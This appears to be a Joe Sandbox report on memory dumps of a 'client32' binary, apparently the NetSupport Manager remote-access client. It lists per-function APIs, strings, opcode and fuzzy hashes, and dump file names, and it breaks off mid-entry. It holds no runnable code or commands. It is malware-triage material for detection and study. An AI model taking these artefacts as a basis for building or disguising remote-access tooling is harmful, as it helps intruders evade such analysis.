Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: EnvironmentExpandFileModuleNameStrings
String ID: :
API String ID: 2034136378-336475711
Opcode ID: 4235481db99a1fe8e38dcad11b9349446c339abffdb1be2f9fdec4ec6dce3d7c
Instruction ID: e8c46cf3d1b56f3be7b1a24a14a9bc1160d60916633b9fa193cc236185d298eb
Opcode Fuzzy Hash: 4235481db99a1fe8e38dcad11b9349446c339abffdb1be2f9fdec4ec6dce3d7c
Instruction Fuzzy Hash: 42212574E043599FDB11CF74CC44FDAFBA89F06B08F1041D4E58897542DB706688CB92

Function 11063460 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52COMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,33E68B52,?,?,00000000,00000000,1117DE18,000000FF,?,110707CF,00000000), ref: 110634BE

Part of subcall function 110290C0: GetLastError.KERNEL32(?,00000000,?), ref: 110290DC
Part of subcall function 110290C0: wsprintfA.USER32 ref: 11029127
Part of subcall function 110290C0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029163
Part of subcall function 110290C0: ExitProcess.KERNEL32 ref: 11029179

Strings

..\ctl32\Connect.cpp, xrefs: 110634D0
event, xrefs: 110634D5

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CreateErrorEventExitLastMessageProcesswsprintf
String ID: ..\ctl32\Connect.cpp$event
API String ID: 3621156866-397488498
Opcode ID: 2a22903093e3ae5410f261dd9c8e44f28682f99e2572a8adbdc4d74290ba7bf3
Instruction ID: fad14faceb7a54f936b2fd7e2bf45be4a77d97d2b7dee1323ed247d5abfe44fc
Opcode Fuzzy Hash: 2a22903093e3ae5410f261dd9c8e44f28682f99e2572a8adbdc4d74290ba7bf3
Instruction Fuzzy Hash: BC117C75A40719AFD721CF69C840B5AFBE8FB45714F00866EE825D7780EBB5A5048B90

Function 110951C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 110951D5

Part of subcall function 1115CAC3: std::exception::exception.LIBCMT ref: 1115CAD8
Part of subcall function 1115CAC3: __CxxThrowException@8.LIBCMT ref: 1115CAED
Part of subcall function 1115CAC3: std::exception::exception.LIBCMT ref: 1115CAFE

_memmove.LIBCMT ref: 11095204

Strings

vector<T> too long, xrefs: 110951D0

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
String ID: vector<T> too long
API String ID: 1785806476-3788999226
Opcode ID: 2952b73fd998563f048a933d1ba53c5bfdc636f6e088622ceb482da1f692f74b
Instruction ID: 217828f4c71c19342a5ecab7fe7428f3d34a376960179f2b8ecf04753e75067f
Opcode Fuzzy Hash: 2952b73fd998563f048a933d1ba53c5bfdc636f6e088622ceb482da1f692f74b
Instruction Fuzzy Hash: E101B5B2E012099FC724CE69DC90CA7B7E9EBD53147148A2EF45A83644EA31F804C790

Function 1100B520 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON

Download Yara Rule

Strings

Error. preventing capbuf overflow, xrefs: 1100B556
Error. NULL capbuf, xrefs: 1100B531

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID:
String ID: Error. NULL capbuf$Error. preventing capbuf overflow
API String ID: 0-3856134272
Opcode ID: 1e46b8443221371624226da598338ba6229d1e1fc81d9cfea01a97a227b660bd
Instruction ID: 1fe7b32914627af8496cb48adae9a6818e21a5ec6a9c865e48965ab0d5b38485
Opcode Fuzzy Hash: 1e46b8443221371624226da598338ba6229d1e1fc81d9cfea01a97a227b660bd
Instruction Fuzzy Hash: CB012BBAA0060997E600CF55F800ADBB3A8DBC037EF04887EEA1ED3501D331B5C18692

Function 11053490 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 110534F1

Strings

IgnoreBroadcastMsg, xrefs: 110534CD
Client, xrefs: 110534D2

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _free
String ID: Client$IgnoreBroadcastMsg
API String ID: 269201875-2698719660
Opcode ID: e11aad12c3f51ef656ab171a1be059b7fd44b4817f8f6ade09273ec36c3574de
Instruction ID: 3f15d83d6a462889b54c0a9847a8d46034e442e60fddb9902ee8397026f0fd0e
Opcode Fuzzy Hash: e11aad12c3f51ef656ab171a1be059b7fd44b4817f8f6ade09273ec36c3574de
Instruction Fuzzy Hash: A101F97AE001125BEBD1DEA1EC81B1B779CAB01318F444076E915DA145ED35F404CB63

Function 1103F5A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 1103F5C0
GetClassNameA.USER32(?,?,00000040), ref: 1103F5D1

Strings

NSSStudentUIClass, xrefs: 1103F5DA

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ClassNameWindow
String ID: NSSStudentUIClass
API String ID: 697123166-3999015762
Opcode ID: 595dfbb0837a989aeefab864ab00cf7b534bfe7c967d94dbad88c57516bd4e20
Instruction ID: f3540196bfee1b67275cde463b27ec343e64e467bcf1490198c7234e26ca9954
Opcode Fuzzy Hash: 595dfbb0837a989aeefab864ab00cf7b534bfe7c967d94dbad88c57516bd4e20
Instruction Fuzzy Hash: 41018431E0262BAFDB01DF618948AAEF7A8AB44355F1141B9ED14A7240D730BA11CBD3

Function 11027460 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(1117B30B,InternetReadFile), ref: 11027474
SetLastError.KERNEL32(00000078,00000000,?,1102973A,1117B30B,00000000,1102C161,?), ref: 1102749D

Strings

InternetReadFile, xrefs: 1102746E

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressErrorLastProc
String ID: InternetReadFile
API String ID: 199729137-1824561397
Opcode ID: 25f72b9f5038b89ec4964a80f4b93fd200d2d05303f84e90b96401370639f8e8
Instruction ID: aaf39ecb06d8050fc4e8701ebb70b1e7302d841f0eaf60db07e5cf5eb66a1f8b
Opcode Fuzzy Hash: 25f72b9f5038b89ec4964a80f4b93fd200d2d05303f84e90b96401370639f8e8
Instruction Fuzzy Hash: CCF01272A10628AFD754DF99E944F97B7E8EB48751F40882AF95597640C770F810CFA0

Function 11075590 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 31COMMON

Download Yara Rule

APIs

DeferWindowPos.USER32(8B000E7F,00000000,98E85BC0,33CD335E,?,00000000,33CD335E,110762E6), ref: 110755D3

Part of subcall function 110290C0: GetLastError.KERNEL32(?,00000000,?), ref: 110290DC
Part of subcall function 110290C0: wsprintfA.USER32 ref: 11029127
Part of subcall function 110290C0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029163
Part of subcall function 110290C0: ExitProcess.KERNEL32 ref: 11029179

Strings

m_hWnd, xrefs: 110755A6
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110755A1

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: DeferErrorExitLastMessageProcessWindowwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 889670253-2830328467
Opcode ID: 403a41022c9912eac067a6dc579c636d5b9043c953c926d52e382482ec531d80
Instruction ID: b1a09bc10e2e4d70b96ca028f02efad9d897396805b7cef8afcf7b0607f28557
Opcode Fuzzy Hash: 403a41022c9912eac067a6dc579c636d5b9043c953c926d52e382482ec531d80
Instruction Fuzzy Hash: CCF01CB661021DAFC704CE89DC80EEBB3EDEB8C354F008119FA19D3250D630E850CBA4

Function 11017030 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,QueueUserWorkItem), ref: 11017044
SetLastError.KERNEL32(00000078), ref: 11017069

Strings

QueueUserWorkItem, xrefs: 1101703E

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressErrorLastProc
String ID: QueueUserWorkItem
API String ID: 199729137-2469634949
Opcode ID: c81191e4254c18433ccdadfae085f98d5b405293371adbcb053233ac0816d12d
Instruction ID: 9bf2a9a6a872030b854bac6c42a4d86694abd2247f4f61199884c76018ac4c83
Opcode Fuzzy Hash: c81191e4254c18433ccdadfae085f98d5b405293371adbcb053233ac0816d12d
Instruction Fuzzy Hash: E1F08C32A10328AFC310DFA8D844E9BB7A8FB48721F00942AFA4187600C634F8108BA0

Function 110EB3F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30registryCOMMON

Download Yara Rule

APIs

RegDeleteValueA.ADVAPI32(00000000,110FCF56,00000000,nsdevcon64.exe,11190240,?,110FCF56,DisabledHID), ref: 110EB3FF

Part of subcall function 110EABE0: wvsprintfA.USER32(?,00020019,?), ref: 110EAC0B

Strings

Error %d deleting %s, xrefs: 110EB415
nsdevcon64.exe, xrefs: 110EB3F7

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: DeleteValuewvsprintf
String ID: Error %d deleting %s$nsdevcon64.exe
API String ID: 4273356409-2392580430
Opcode ID: 0ef8c5a0046495df157eaba78a1fc218dea4b2c922950014af4335056785504f
Instruction ID: 354e63fa6b4daf28927bc78cd7827d252e382455304d7cb5e7625f1e96fe7c16
Opcode Fuzzy Hash: 0ef8c5a0046495df157eaba78a1fc218dea4b2c922950014af4335056785504f
Instruction Fuzzy Hash: 4DE086B7E061257F4611919EACC9DABFB9CDA556E53414136FA08D3201E961DC1082F1

Function 110274B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(1117B30B,InternetCloseHandle), ref: 110274C4
SetLastError.KERNEL32(00000078,00000000,?,110297CB,1117B30B), ref: 110274E1

Strings

InternetCloseHandle, xrefs: 110274BE

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressErrorLastProc
String ID: InternetCloseHandle
API String ID: 199729137-3843628324
Opcode ID: 1b6e93195561b6ae7fac2394f1119c484194f36d55897542f86653d00150cad3
Instruction ID: a471f6b140d99853eb0e50f92d4c8664851c42395f886987b729413160a6e4f5
Opcode Fuzzy Hash: 1b6e93195561b6ae7fac2394f1119c484194f36d55897542f86653d00150cad3
Instruction Fuzzy Hash: 76E09272A016285BC330DFA9E844A46FBE8DB24725F00453BE64597200CB70A8448BE0

Function 11001080 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageA.USER32(?,?,?,?,?), ref: 110010B7

Part of subcall function 110290C0: GetLastError.KERNEL32(?,00000000,?), ref: 110290DC
Part of subcall function 110290C0: wsprintfA.USER32 ref: 11029127
Part of subcall function 110290C0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029163
Part of subcall function 110290C0: ExitProcess.KERNEL32 ref: 11029179

Strings

m_hWnd, xrefs: 11001096
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001091

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$ErrorExitItemLastProcessSendwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 2046328329-2830328467
Opcode ID: 763521eb4a5bcce99d3069df3d0a853de717b5d3c46341ee94aea9d88fad8ff2
Instruction ID: 87cd78a4c45367f407f7f654ff9088e1ea0403da672f43fd4429235dc73efe54
Opcode Fuzzy Hash: 763521eb4a5bcce99d3069df3d0a853de717b5d3c46341ee94aea9d88fad8ff2
